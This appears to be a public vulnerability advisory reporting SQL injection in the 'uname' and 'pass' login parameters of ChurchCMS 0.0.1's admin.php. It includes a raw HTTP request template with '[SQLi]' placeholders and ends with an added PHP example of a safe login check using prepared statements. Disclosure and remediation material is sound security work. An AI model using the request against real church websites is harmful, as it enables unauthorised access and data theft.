# Exploit Title: ChurchCMS 0.0.1 'admin.php' Multiple SQLi
# Date: 04/21/12
# Author: G13
# Twitter: @g13net
# Software Link: http://sourceforge.net/projects/churchcms/?source=directory
# Version: 0.0.1
# Category: webapps (php)
#

##### Description #####

ChurchCMS is the software to place on your church's website that is easily managed, self-intuitive, yet expandable via our module library. Included features are: announcements, calendar, prayer requests manager, and help wanted manager.

##### Vulnerability #####

The admin.php page has multiple SQL injection vulnerabilities.

Both the 'uname' and 'pass' parameters are vulnerable to SQL Injection. The vulnerability exists via the POST method.

##### Exploit #####

POST http://localhost/churchcms/admin.php?op=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://localhost/churchcms/index.php
Cookie: PHPSESSID=eq342ldrgqt4i5fshe6q2kvj17
Content-Type: application/x-www-form-urlencoded
Content-length: 40

uname=[SQLi]&pass=[SQLi]

##### Vendor Notification #####

04/21/12 - Vendor notified

Per my disclosure policy, advisory is released.

http://www.g13net.com/vuln-disc.txt
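
One way to handle the 'uname' and 'pass' login parameters safely, as an added example (not ChurchCMS code and not part of the original advisory): a login check built on a PDO prepared statement and password_verify(). The `users` table, its column names, the check_login() helper and the in-memory SQLite data are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not ChurchCMS code. The `users` table and its columns are
// assumed names; the in-memory SQLite database is constructed sample data.

function check_login(PDO $db, string $uname, string $pass): bool
{
    // The placeholder keeps 'uname' out of the SQL text, so quotes or SQL
    // keywords in the POST body are compared as data and never parsed.
    $stmt = $db->prepare('SELECT pass_hash FROM users WHERE uname = :uname');
    $stmt->execute([':uname' => $uname]);
    $hash = $stmt->fetchColumn();   // false when no such user

    // 'pass' never reaches the database: it is checked against the stored
    // hash. A dummy hash keeps the work similar for unknown users.
    static $dummy = null;
    $dummy ??= password_hash('unused', PASSWORD_DEFAULT);
    $ok = password_verify($pass, is_string($hash) ? $hash : $dummy);

    return $ok && is_string($hash);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (uname TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (uname, pass_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);
$ins->execute(["o'brien", password_hash("it's fine", PASSWORD_DEFAULT)]);

// Constructed inputs standing in for $_POST['uname'] and $_POST['pass'].
$cases = [
    ['admin', 'correct horse'],    // valid credentials
    ['admin', 'wrong'],            // wrong password
    ["o'brien", "it's fine"],      // quotes are ordinary data
    ["admin'", 'correct horse'],   // stray quote: no match, no SQL error
];
foreach ($cases as [$u, $p]) {
    printf("%-10s %s\n", $u, check_login($db, $u, $p) ? 'accepted' : 'rejected');
}
```

With string concatenation the last case would change the structure of the query; with the bound parameter it is simply a user name that does not exist.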